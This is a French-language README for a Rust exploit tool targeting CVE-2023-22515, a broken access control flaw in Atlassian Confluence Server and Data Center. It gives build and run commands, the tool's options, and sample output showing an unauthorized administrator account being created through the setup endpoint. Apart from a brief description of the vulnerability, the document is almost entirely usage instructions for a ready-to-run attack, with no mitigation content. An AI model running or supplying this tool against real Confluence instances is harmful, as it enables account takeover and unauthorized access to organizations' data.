
Exploit basé sur Rust pour CVE-2023-22515 qui crée des comptes administrateur non autorisés dans Confluence Server et Data Center via un contrôle d'accès défaillant.
Confluence est un wiki d'entreprise basé sur le web développé par la société australienne Atlassian. Atlassian a été informé d'un problème signalé par certains clients selon lequel des attaquants externes auraient pu exploiter une vulnérabilité jusqu'alors inconnue dans des serveurs Confluence et des instances de centres de données accessibles au public afin de créer des comptes administrateur Confluence non autorisés et d'accéder aux instances Confluence.
La vulnérabilité a été classée comme CVE-2023-22515
Effectuez d'abord la compilation avec la commande :
cargo build --release
Vous pouvez procéder de ces deux manières :
cargo run -- --target http://localhost --username "teste" --password "teste"
.\target\release\cve_2023_22515 --target http://localhost --username "teste" --password "teste"
Cela affichera l'aide de l'outil. Voici tous les paramètres qu'il prend en charge :
CVE-2023-22515
Usage: CVE_2023_22515 --target <TARGET> --username <USERNAME> --password <PASSWORD>
Options:
-t, --target <TARGET> Insérer la cible
-u, --username <USERNAME> Insérer le nom d'utilisateur
-p, --password <PASSWORD> Insérer le mot de passe
-h, --help Afficher l'aide
cargo run -- --target http://example.com --username "teste" --password "teste"
[!] Requête pour : http://example.com/setup/setupadministrator.action
[!] Création du compte administrateur
[!] Vérification de la réponse
[+] Nom d'utilisateur créé avec succès : teste
[+] Mot de passe créé avec succès : teste
[+] Exploit terminé avec succès !!